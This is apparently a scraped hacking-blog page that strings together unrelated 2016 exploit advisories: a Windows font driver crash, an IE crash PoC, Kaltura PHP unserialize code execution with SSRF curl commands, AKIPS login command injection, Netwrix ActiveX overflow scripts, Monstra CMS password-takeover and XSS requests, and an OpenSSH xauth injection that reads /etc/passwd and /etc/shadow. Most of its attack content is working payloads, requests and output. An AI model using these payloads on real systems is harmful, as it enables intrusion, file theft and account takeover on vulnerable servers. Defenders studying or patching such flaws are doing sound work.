Source: https://code.google.com/p/google-security-research/issues/detail?id=682
We have encountered a Windows kernel crash in the ATMFD.DLL OpenType driver while processing a corrupted OTF font file:
---
DRIVER_OVERRAN_STACK_BUFFER (f7)
A driver has overrun a stack-based buffer. This overrun could potentially
allow a malicious user to gain control of this machine.
DESCRIPTION
A driver overran a stack-based buffer (or local variable) in a way that would
have overwritten the function's return address and jumped back to an arbitrary
address when the function returned. This is the classic "buffer overrun"
hacking attack and the system has been brought down to prevent a malicious user
from gaining complete control of it.
Do a kb to get a stack backtrace -- the last routine on the stack before the
buffer overrun handlers and bugcheck call is the one that overran its local
variable(s).
Arguments:
Arg1: a6703535, Actual security check cookie from the stack
Arg2: 98ee9e09, Expected security check cookie
Arg3: 671161f6, Complement of the expected security check cookie
Arg4: 00000000, zero
Debugging Details:
------------------
DEFAULT_BUCKET_ID: VERIFIER_ENABLED_VISTA_MINIDUMP
SECURITY_COOKIE: Expected 98ee9e09 found a6703535
CUSTOMER_CRASH_COUNT: 1
BUGCHECK_STR: 0xF7
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre
LAST_CONTROL_TRANSFER: from 98ea5720 to 82725b84
STACK_TEXT:
a6723488 98ea5720 000000f7 a6703535 98ee9e09 nt!KeBugCheckEx+0x1e
WARNING: Stack unwind information not available. Following frames may be wrong.
a67234a8 98ec57f6 00000085 00400000 08680370 ATMFD+0x15720
a672353c 98ec5b0e 00400000 a6723790 00400000 ATMFD+0x357f6
a6723610 8297ef90 ff68a000 00000000 ff68a000 ATMFD+0x35b0e
a6723624 99180853 3e9ca839 a6723734 98ec5063 nt!VerifierExFreePoolWithTag+0x30
a6723638 00400000 a672364c a6723790 a6723868 win32k!VerifierEngFreeMem+0x5b
a6723790 98e95328 98e953b4 98e953be 98e95442 0x400000
a67237c8 00000000 00001f98 00000000 00000000 ATMFD+0x5328
---
While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "CFF " table.
The immediate reason of the bugcheck is a stack corruption detected by the stack cookie protection (/GS). The issue reproduces on Windows 7 and 8.1; other platforms were not tested. In our environment, it is sufficient to open the offending font in the default Windows Font Viewer to reproduce the crash, or even click on a folder icon containing the font in Windows Explorer.
Attached is an archive with the proof-of-concept mutated OTF file, together with the original font used to generate it and a corresponding crash log from Windows 7 32-bit.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39561.zip
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863286500
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
<!--
Source: https://code.google.com/p/google-security-research/issues/detail?id=677
Minimized PoC:
-->
<style type="text/css">
*:before {
content:counter(counter-0) close-quote url(?);
column-count:1;
position:fixed;
}
</style>
<!--
Backtrace for reference:
2:051:x86> k
ChildEBP RetAddr
0c2c9688 60ca029e MSHTML!Layout::LayoutBuilderDriver::BuildPageLayout+0x6f2093
0c2c974c 60c9fe17 MSHTML!Layout::PageCollection::FormatPage+0x167
0c2c9854 60caad7e MSHTML!Layout::PageCollection::LayoutPagesCore+0x2c3
0c2c9880 60caac9f MSHTML!Layout::PageCollection::LayoutPages+0xca
0c2c9938 60caa49c MSHTML!CMarkupPageLayout::CalcPageLayoutSize+0x3b8
0c2c99c0 61295d6e MSHTML!CMarkupPageLayout::CalcTopLayoutSize+0xec
0c2c9a04 60c8c52f MSHTML!CView::EnsureSize+0x224
0c2c9a5c 610977ce MSHTML!CView::EnsureView+0x3a5
0c2c9b10 60dd92ab MSHTML!CDoc::RunningToInPlace+0x1b4
0c2c9b30 60dfaabe MSHTML!CServer::TransitionTo+0x50
0c2c9b48 62118e72 MSHTML!CServer::Show+0x50
0c2c9b68 62118d61 IEFRAME!CDocObjectHost::_ShowMsoView+0xd8
0c2c9b84 6109585d IEFRAME!CDocObjectHost::ActivateMe+0x31
0c2c9ba8 610957d1 MSHTML!CServer::ActivateView+0x81
0c2c9bd8 6109577b MSHTML!CServer::DoUIActivate+0x21
0c2c9c0c 60df9e59 MSHTML!CServer::DoVerb+0x77
0c2c9c4c 60df9e0e MSHTML!CMarkup::Navigate+0x3b
0c2c9c5c 62118f52 MSHTML!CDoc::Navigate+0x1e
0c2c9ca0 62273041 IEFRAME!CDocObjectHost::_ActivateMsoView+0x8f
0c2c9cc0 620b51c0 IEFRAME!CDocObjectHost::UIActivate+0x4c
0c2c9cd8 62272f7d IEFRAME!CDocObjectView::UIActivate+0x20
0c2c9d04 620dc130 IEFRAME!CBaseBrowser2::_UIActivateView+0xa5
0c2cbdd0 620e464c IEFRAME!CBaseBrowser2::v_ActivatePendingView+0x200
0c2cbdf0 620e01a4 IEFRAME!CShellBrowser2::v_ActivatePendingView+0x2c
0c2cbe0c 620e00c9 IEFRAME!CBaseBrowser2::_ExecShellDocView+0xcb
0c2cbe40 6209bf4c IEFRAME!CBaseBrowser2::Exec+0x20c
0c2cc0d0 620dafd5 IEFRAME!CShellBrowser2::Exec+0xdd
0c2cc108 620d9a4b IEFRAME!CDocObjectHost::_Navigate+0x50
0c2cc338 620da7f2 IEFRAME!CDocObjectHost::_OnReadyState+0x13c
0c2cc398 620da728 IEFRAME!CDocObjectHost::_OnChangedReadyState+0xc6
0c2cc3a0 60d9c704 IEFRAME!CDocObjectHost::OnChanged+0x1b
0c2cc3f0 60d82967 MSHTML!CBase::FirePropertyNotify+0x106
0c2cc414 60d8869c MSHTML!CMarkup::SetReadyState+0x85
0c2cc5b8 60d8d5ee MSHTML!CMarkup::SetInteractiveInternal+0x2bc
0c2cc5ec 60d8de5e MSHTML!CMarkup::RequestReadystateInteractive+0x92
0c2cc618 60d7cfea MSHTML!CMarkup::BlockScriptExecutionHelper+0xf7
0c2cc74c 60d83a78 MSHTML!CHtmPost::Exec+0xa1c
0c2cc76c 60d839de MSHTML!CHtmPost::Run+0x3d
0c2cc78c 60d8c2c3 MSHTML!PostManExecute+0x61
0c2cc7a0 60d8d0f8 MSHTML!PostManResume+0x7b
0c2cc7d0 60d4a45d MSHTML!CHtmPost::OnDwnChanCallback+0x38
0c2cc7e8 60c6d55b MSHTML!CDwnChan::OnMethodCall+0x2f
0c2cc830 60c6cc72 MSHTML!GlobalWndOnMethodCall+0x17b
0c2cc884 757d8e71 MSHTML!GlobalWndProc+0x103
0c2cc8b0 757d90d1 user32!_InternalCallWinProc+0x2b
0c2cc944 757da62a user32!UserCallWinProcCheckWow+0x18e
0c2cc9b8 757da680 user32!DispatchMessageWorker+0x473
0c2cc9c4 6207a77c user32!DispatchMessageW+0x10
0c2cfb94 620edf88 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464
0c2cfc54 7201ebec IEFRAME!LCIETab_ThreadProc+0x3e7
0c2cfc6c 67d73a31 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1c
0c2cfca4 67f99608 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94
WARNING: Stack unwind information not available. Following frames may be wrong.
0c2cfce0 75a77c04 vfbasics+0x19608
0c2cfcf4 77a1ad5f KERNEL32!BaseThreadInitThunk+0x24
0c2cfd3c 77a1ad2a ntdll_779c0000!__RtlUserThreadStart+0x2f
0c2cfd4c 00000000 ntdll_779c0000!_RtlUserThreadStart+0x1b
-->
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Kaltura Community Edition Multiple Vulnerabilities
Affected versions: Kaltura Community Edition <=11.1.0-2
PDF:
http://www.security-assessment.com/files/documents/advisory/Kaltura-Multiple-Vulns.pdf
+-----------+
|Description|
+-----------+
The Kaltura platform contains a number of vulnerabilities, allowing
unauthenticated users to execute code, read files, and access services
listening on the localhost interface. Vulnerabilities present in the
application also allow authenticated users to execute code by uploading
a file, and perform stored cross site scripting attacks from the Kaltura
Management Console into the admin console. Weak cryptographic secret
generation allows unauthenticated users to bruteforce password reset
tokens for accounts, and allows low level users to perform privilege
escalation attacks.
+------------+
|Exploitation|
+------------+
==Unserialize Code Execution==
The following PHP POC will generate an object that leads to code
execution when posted to an endpoint present on the server.
Authentication is not required.
[POC]
<?php
$init = "system('id;uname -a')";
$cmd = $init.".die()";
$len = strlen($cmd);
$obj="a:1:{s:1:\"z\";O:8:\"Zend_Log\":1:{s:11:\"\0*\0_writers\";a:1:{i:0;O:20:\"Zend_Log_Writer_Mail\":5:{s:16:\"\0*\0_eventsToMail\";a:1:{i:0;i:1;}s:22:\"\0*\0_layoutEventsToMail\";a:0:{}s:8:\"\0*\0_mail\";O:9:\"Zend_Mail\":0:{}s:10:\"\0*\0_layout\";O:11:\"Zend_Layout\":3:{s:13:\"\0*\0_inflector\";O:23:\"Zend_Filter_PregReplace\":2:{s:16:\"\0*\0_matchPattern\";s:7:\"/(.*)/e\";s:15:\"\0*\0_replacement\";s:$len:\"$cmd\";}s:20:\"\0*\0_inflectorEnabled\";b:1;s:10:\"\0*\0_layout\";s:6:\"layout\";}s:22:\"\0*\0_subjectPrependText\";N;}}};}";
$sploit = base64_encode($obj);
echo $sploit;
?>
------------
The Base64 encoded object generated above should be included in the
kdata section of the following curl request:
$curl
http://[HOST]/index.php/keditorservices/redirectWidgetCmd?kdata=$[sploit]
==Arbitrary File Upload==
Users authenticated to the KMC with appropriate privileges can upload
arbitrary files through the "Upload Content" functionality. This can be
used to upload a PHP web shell as an image file and gain command
execution. In order to excute the code, the on-disk path of the uploaded
file must be obtained, and then browsed to directly. Obtaining the
uploaded file's path can be achieved with the following command.
[POC]
$curl
http://[HOST]/index.php/keditorservices/getAllEntries?list_type=1&entry_id=0_3v2568rx
-b "[Valid Cookie]"
Directly accessing the path "url" returned by the above request will
result in the exceution of the uploaded php script.
$curl http://[HOST]/[URL PATH]
==SSRF / File Read (Limited)==
A limited number of files on the host can be read by passing a "file://"
protocol handler to a CURL call.
[POC]
$curl
http://[HOST]/html5/html5lib/v2.34/simplePhpXMLProxy.php?url=file://127.0.0.1/opt/kaltura/app/configurations/local.ini
Arbitrary IP addresses can be supplied, resulting in an SSRF issue. The
following POC uses the SSRF issue to send a command and retrieve
statistics from memcached listening on localhost, which is present in a
default Kaltura install.
[POC]
$curl
http://[HOST]/html5/html5lib/v2.34/simplePhpXMLProxy.php?url=http://127.0.0.1:11211
-m 2 --data $'b=set nl 0 60 4\n\n\n\n\n'
$curl
http://[HOST]/html5/html5lib/v2.34/simplePhpXMLProxy.php?url=http://127.0.0.1:11211
--data "c=get nl&d=stats&e=quit"
+----------+
| Solution |
+----------+
Upgrading to the most recent version of Kaltura (11.7.0-2) will fix the
majority of these issues. No fixes are available for some of the issues
disclosed, so carefully firewalling off the Kaltura interface is
recommended.
+------------+
| Additional |
+------------+
A disclosure timeline, further information and additional less critical
vulnerabilities are available in the accompanying PDF.
http://www.security-assessment.com/files/documents/advisory/Kaltura-Multiple-Vulns.pdf
# Exploit Title: AKIPS Network Monitor 15.37-16.6 OS Command Injection
# Date: 03-14-2016
# Exploit Author: BrianWGray
# Contact: https://twitter.com/BrianWGray
# WebPage: http://somethingbroken.com/
# Vendor Homepage: https://www.akips.com/
# Software Link: https://www.akips.com/showdoc/download
# Version: 15.37 through 16.5, May impact earlier versions, remediated in 16.6
# Tested on: FreeBSD 10.2-RELEASE-p7
# CVE : N/A
1. Description
The "username" login parameter allows for OS Command injection via command Injection during a failed login attempt returns the command injection output to a limited login failure field.
By using concatenation '||' a command may be appended to the username.
The vendor has stated the following:
"Apparently the issue is in a Perl module which does an open2() of a
custom PAM program. The command is not being properly sanitised." - Vendor Reply
http://somethingbroken.com/vuln/0002.html
2. Proof of Concept
example request:
curl 'https://Application/' --data 'username=%7C%7C+whoami&password=' --compressed --insecure -# | grep -wF "Error signing in:"
example response:
<div class="alert alert-warning"><strong>Error signing in:</strong> akips</div>
3. Solution:
Update to version 16.6
https://www.akips.com/showdoc/download
4. Timeline:
* 03-14-2016: Discovered, Vendor Notified, Vendor Response
* 03-15-2016: Vendor Releases Remediated Build 16.6
Netwrix Auditor 7.1.322.0 ActiveX (sourceFile) Stack Buffer Overflow Vulnerability
Vendor: Netwrix Corporation
Product web page: http://www.netwrix.com
Affected version: 7.1 (Build 322)
Summary: Netwrix Auditor is an IT audit software that maximizes visibility
of IT infrastructure changes and data access. The product provides actionable
audit data about who changed what, when and where and who has access to what.
Desc: The application suffers from a stack-based buffer overflow vulnerability
when parsing large amount of bytes to the 'sourceFile' string parameter in
PackFile() and UnpackFile() functions in 'Netwrix.Common.CollectEngine.dll'
library, resulting in stack overrun overwriting several registers including
the SEH chain. An attacker can gain access to the system of the affected node
and execute arbitrary code.
----------------------------------------------------------------------------
STATUS_STACK_BUFFER_OVERRUN encountered
(1fbc.1470): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=63d7e5b8 ecx=7693047c edx=0040db55 esi=00000000 edi=0072a4ac
eip=7693025d esp=0040dd9c ebp=0040de18 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
kernel32!GetProfileStringW+0x12cc1:
7693025d cc int 3
--
(1a98.1c4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for C:\Program Files (x86)\Common Files\Netwrix Auditor\Event Collector\Netwrix.Common.CollectEngine.dll
eax=00000041 ebx=000012b2 ecx=00350000 edx=00000020 esi=00762240 edi=0034dc7c
eip=5dd16895 esp=0034d75c ebp=0034d778 iopl=0 nv up ei pl nz ac po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010213
Netwrix_Common_CollectEngine!DllUnregisterServer+0x21725:
5dd16895 668901 mov word ptr [ecx],ax ds:002b:00350000=????
0:000> !exchain
0034e51c: 00410041
Invalid exception stack at 00410041
----------------------------------------------------------------------------
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5311
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5311.php
07.12.2015
--
#1
<html>
<object classid='clsid:F45C10B1-AEB6-4D2C-BC17-97749DA1F908' id='acnid' />
<script language='VBScript'>
Target = "C:\Program Files (x86)\Common Files\Netwrix Auditor\Event Collector\Netwrix.Common.CollectEngine.dll"
Prototype = "Sub PackFile (ByVal sourceFile As String, ByVal packedFile As String)"
Member = "PackFile"
ID = "CollectEngineLib.FileCompress"
src = String(2000, "A")
packed = "exploit.zip"
acnid.PackFile src, packed
</script>
#2
<html>
<object classid='clsid:F45C10B1-AEB6-4D2C-BC17-97749DA1F908' id='anida' />
<script language='VBScript'>
Target = "C:\Program Files (x86)\Common Files\Netwrix Auditor\Event Collector\Netwrix.Common.CollectEngine.dll"
Prototype = "Sub UnpackFile (ByVal sourceFile As String, ByVal unpackedFile As String)"
Member = "UnpackFile"
ID = "CollectEngineLib.FileCompress"
src = String(900, "A") + "BB" + "CC" + String(105, "D") + String(100, "EE")
unpack = "exploit.zip"
anida.UnpackFile src, unpack
</script>
</html>
Exploit Title: Monstra CMS 3.0.3 - Privilege Escalation / Remote Password Change
Google Dork: intext:"Powered by Monstra"/users/registration
Date: 2016-03-28
Exploit Author: Sarim Kiani
Vendor Homepage: http://monstra.org
Software Link: http://monstra.org/download
Version: 3.0.3
Tested on: Windows OS
==================== TIMELINE ====================
- Discovery Date: March 16 2016
- Disclosed to Vendor: March 22 2016
- Vendor Fixed the Issue: March 27 2016
==================================================
Bug Tracking ID: Github Issue # 405
Link: https://github.com/monstra-cms/monstra/issues/405
Application Description: Monstra is a modern light weighted Content Management System written in php.
1. Vulnerability Description:
Any user can change credentials of other users including the Administrator credentials. This can allow the attacker to gain Administrator access and completely compromise the application.
Once logged in as a regular user or successfully registering as a new user, use the following URL to gain information (username) of other users:
http://localhost/monstra-3.0.3/users/1
The digit '1' is of Admin or first user created in the database. By changing the digit, all registered usernames can be found.
Then by using the 'Edit Profile' option of own user account, password of any other user including the Administrator can be changed by changing the POST parameters 'user_id', 'login' and 'new_password'.
2. Proof of Concept/Code Flaw:
`In file monstra\plugins\box\users\users.plugin.php
Function: getProfileEdit
Line No: 233
if (Users::$users->update(Request::post('user_id'),
array('login' => Security::safeName(Request::post('login')),
'firstname' => Request::post('firstname'),
'lastname' => Request::post('lastname'),
'email' => Request::post('email'),
'skype' => Request::post('skype'),
'about_me' => Request::post('about_me'),
'twitter' => Request::post('twitter')))) {
// Change password
if (trim(Request::post('new_password')) != '') {
Users::$users->update(Request::post('user_id'), array('password' => Security::encryptPassword(trim(Request::post('new_password')))));
}
Notification::set('success', __('Your changes have been saved.', 'users'));
Request::redirect(Site::url().'/users/'.$user['id']);
On editing profile user id is taken from Request::post('user_id'). An attacker can provide any user id on change password funcionality
Users::$users->update --> updates the password`
Header:
> POST /monstra-3.0.3/users/8/edit HTTP/1.1
Host: localhost
Content-Length: 152
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/monstra-3.0.3/users/8/edit
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US; has_js=1; PHPSESSID=abtuklkn1r0rjbub01527gjav0; _ga=GA1.1.592562515.1457951975; login_attempts=i%3A4%3B
csrf=eb616fed8ca93d9de582a4f7d75ee3a3a0d6e3ec&user_id=8&login=user&firstname=&lastname=&email=&twitter=&skype=&about_me=&new_password=&edit_profile=Save
3. Solution:
Vendor has resolved the issue, use the patch 'User Security Fix # 406'.
Link: https://github.com/monstra-cms/monstra/pull/406/commits/2e2a22ee5aafa28771f87c108edea024b618a8d5
##################################################################################
#Exploit Title: Monstra CMS 3.0.3 - Persistent XSS
#Google Dork: intext:"Powered by Monstra"
#Date: 2016-03-16
#Exploit Author: Sarim Kiani
#Vendor Homepage: http://monstra.org
#Software Link: http://monstra.org/download
#Version: 3.0.3
#Tested on: Windows OS
Monstra is a modern light weighted Content Management System written in php.
1. Description
A Persistent XSS exists in the "Edit Profile" page of the application.
2. Proof of Concept
Any user entering personal information in the "Edit Profile" page of the application can insert XSS Payload in the Form.
Payload: "><script>alert(1);</script>
The following entries on the page are vulnerable to a Persistent XSS payload:
'Firstname', 'Lastname', 'Email', 'Twitter', 'Skype' and 'About Me'.
POST /monstra-3.0.3/users/8/edit HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/monstra-3.0.3/users/8/edit
Cookie: GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; SCREEN_NAME=5374564c7570434448716b3d; SESS7a361a010634612fb69871c3ab2715f1=05e_dlYEnDv4-n3tC89gHEXGp3l-L5CXZY7LNgxFIFg; docebo_session=an9dgdq6rmlg3bv5b29tj45653; PHPSESSID=no30picpa0c5khn86lmcd53cb5; _ga=GA1.1.739562915.1457952544
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 440
csrf=685bba70d144b8b8727937b56f5b87e669135fe1&user_id=8&login=user&firstname=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&lastname=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&email=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&twitter=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&skype=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&about_me=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&new_password=&edit_profile=Save
3.Solution
No newer (fixed) versions are currently available.
'''
Author: <github.com/tintinweb>
Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115
Version: 0.2
Date: Mar 3rd, 2016
Tag: openssh xauth command injection may lead to forced-command and /bin/false bypass
Overview
--------
Name: openssh
Vendor: OpenBSD
References: * http://www.openssh.com/[1]
Version: 7.2p1 [2]
Latest Version: 7.2p1
Other Versions: <= 7.2p1 (all versions; dating back ~20 years)
Platform(s): linux
Technology: c
Vuln Classes: CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')
Origin: remote
Min. Privs.: post auth
CVE: CVE-2016-3115
Description
---------
quote website [1]
> OpenSSH is the premier connectivity tool for remote login with the SSH protocol. It encrypts all traffic to eliminate eavesdropping, connection hijacking, and other attacks. In addition, OpenSSH provides a large suite of secure tunneling capabilities, several authentication methods, and sophisticated configuration options.
Summary
-------
An authenticated user may inject arbitrary xauth commands by sending an
x11 channel request that includes a newline character in the x11 cookie.
The newline acts as a command separator to the xauth binary. This attack requires
the server to have 'X11Forwarding yes' enabled. Disabling it, mitigates this vector.
By injecting xauth commands one gains limited* read/write arbitrary files,
information leakage or xauth-connect capabilities. These capabilities can be
leveraged by an authenticated restricted user - e.g. one with the login shell
configured as /bin/false or one with configured forced-commands - to bypass
account restriction. This is generally not expected.
The injected xauth commands are performed with the effective permissions of the
logged in user as the sshd already dropped its privileges.
Quick-Info:
* requires: X11Forwarding yes
* bypasses /bin/false and forced-commands
** OpenSSH does not treat /bin/false like /bin/nologin (in contrast to Dropbear)
* does not bypass /bin/nologin (as there is special treatment for this)
Capabilities (xauth):
* Xauth
* write file: limited chars, xauthdb format
* read file: limit lines cut at first \s
* infoleak: environment
* connect to other devices (may allow port probing)
PoC see ref github.
Patch see ref github.
Details
-------
// see annotated code below
* server_input_channel_req (serverloop.c)
*- session_input_channel_req:2299 (session.c [2])
*- session_x11_req:2181
* do_exec_pty or do_exec_no_pty
*- do_child
*- do_rc_files (session.c:1335 [2])
Upon receiving an `x11-req` type channel request sshd parses the channel request
parameters `auth_proto` and `auth_data` from the client ssh packet where
`auth_proto` contains the x11 authentication method used (e.g. `MIT-MAGIC-COOKIE-1`)
and `auth_data` contains the actual x11 auth cookie. This information is stored
in a session specific datastore. When calling `execute` on that session, sshd will
call `do_rc_files` which tries to figure out if this is an x11 call by evaluating
if `auth_proto` and `auth_data` (and `display`) are set. If that is the case AND
there is no system `/sshrc` existent on the server AND it no user-specific `$HOME/.ssh/rc`
is set, then `do_rc_files` will run `xauth -q -` and pass commands via `stdin`.
Note that `auth_data` nor `auth_proto` was sanitized or validated, it just contains
user-tainted data. Since `xauth` commands are passed via `stdin` and `\n` is a
command-separator to the `xauth` binary, this allows a client to inject arbitrary
`xauth` commands.
Sidenote #1: in case sshd takes the `$HOME/.ssh/rc` branch, it will pass the tainted
input as arguments to that script.
Sidenote #2: client code also seems to not sanitize `auth_data`, `auth_proto`. [3]
This is an excerpt of the `man xauth` [4] to outline the capabilities of this xauth
command injection:
SYNOPSIS
xauth [ -f authfile ] [ -vqibn ] [ command arg ... ]
add displayname protocolname hexkey
generate displayname protocolname [trusted|untrusted] [timeout seconds] [group group-id] [data hexdata]
[n]extract filename displayname...
[n]list [displayname...]
[n]merge [filename...]
remove displayname...
source filename
info
exit
quit
version
help
?
Interesting commands are:
info - leaks environment information / path
~# xauth info
xauth: file /root/.Xauthority does not exist
Authority file: /root/.Xauthority
File new: yes
File locked: no
Number of entries: 0
Changes honored: yes
Changes made: no
Current input: (argv):1
source - arbitrary file read (cut on first `\s`)
# xauth source /etc/shadow
xauth: file /root/.Xauthority does not exist
xauth: /etc/shadow:1: unknown command "smithj:Ep6mckrOLChF.:10063:0:99999:7:::"
extract - arbitrary file write
* limited characters
* in xauth.db format
* since it is not compressed it can be combined with `xauth add` to
first store data in the database and then export it to an arbitrary
location e.g. to plant a shell or do other things.
generate - connect to <ip>:<port> (port probing, connect back and pot. exploit
vulnerabilities in X.org
Source
------
Inline annotations are prefixed with `//#!`
/*
* Run $HOME/.ssh/rc, /etc/ssh/sshrc, or xauth (whichever is found
* first in this order).
*/
static void
do_rc_files(Session *s, const char *shell)
{
...
snprintf(cmd, sizeof cmd, "%s -q -",
options.xauth_location);
f = popen(cmd, "w"); //#! run xauth -q -
if (f) {
fprintf(f, "remove %s\n", //#! remove <user_tainted_data> - injecting \n auth_display injects xauth command
s->auth_display);
fprintf(f, "add %s %s %s\n", //#! \n injection
s->auth_display, s->auth_proto,
s->auth_data);
pclose(f);
} else {
fprintf(stderr, "Could not run %s\n",
cmd);
}
}
}
Proof of Concept
----------------
Prerequisites:
* install python 2.7.x
* issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x
* make sure `poc.py`
Usage: <host> <port> <username> <password or path_to_privkey>
path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key
poc:
1. configure one user (user1) for `force-commands` and another one with `/bin/false` in `/etc/passwd`:
#PUBKEY line - force commands: only allow "whoami"
#cat /home/user1/.ssh/authorized_keys
command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user1@box
#cat /etc/passwd
user2:x:1001:1002:,,,:/home/user2:/bin/false
2. run sshd with `X11Forwarding yes` (kali default config)
#> /root/openssh-7.2p1/sshd -p 22 -f sshd_config -D -d
3. `forced-commands` - connect with user1 and display env information
#> python <host> 22 user1 .demoprivkey
INFO:__main__:add this line to your authorized_keys file:
#PUBKEY line - force commands: only allow "whoami"
#cat /home/user/.ssh/authorized_keys
command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box
INFO:__main__:connecting to: user1:<PKEY>@host:22
INFO:__main__:connected!
INFO:__main__:
Available commands:
.info
.readfile <path>
.writefile <path> <data>
.exit .quit
<any xauth command or type help>
#> .info
DEBUG:__main__:auth_cookie: '\ninfo'
DEBUG:__main__:dummy exec returned: None
INFO:__main__:Authority file: /home/user1/.Xauthority
File new: no
File locked: no
Number of entries: 1
Changes honored: yes
Changes made: no
Current input: (stdin):3
/usr/bin/xauth: (stdin):2: bad "add" command line
...
4. `forced-commands` - read `/etc/passwd`
...
#> .readfile /etc/passwd
DEBUG:__main__:auth_cookie: 'xxxx\nsource /etc/passwd\n'
DEBUG:__main__:dummy exec returned: None
INFO:__main__:root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
...
5. `forced-commands` - write `/tmp/testfile`
#> .writefile /tmp/testfile `thisisatestfile`
DEBUG:__main__:auth_cookie: '\nadd 127.0.0.250:65500 `thisisatestfile` aa'
DEBUG:__main__:dummy exec returned: None
DEBUG:__main__:auth_cookie: '\nextract /tmp/testfile 127.0.0.250:65500'
DEBUG:__main__:dummy exec returned: None
DEBUG:__main__:/usr/bin/xauth: (stdin):2: bad "add" command line
#> ls -lsat /tmp/testfile
4 -rw------- 1 user1 user1 59 xx xx 13:49 /tmp/testfile
#> cat /tmp/testfile
\FA65500hi\FA65500`thisisatestfile`\AA
6. `/bin/false` - connect and read `/etc/passwd`
#> python <host> 22 user2 user2password
INFO:__main__:connecting to: user2:user2password@host:22
INFO:__main__:connected!
INFO:__main__:
Available commands:
.info
.readfile <path>
.writefile <path> <data>
.exit .quit
<any xauth command or type help>
#> .readfile /etc/passwd
DEBUG:__main__:auth_cookie: 'xxxx\nsource /etc/passwd\n'
DEBUG:__main__:dummy exec returned: None
INFO:__main__:root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
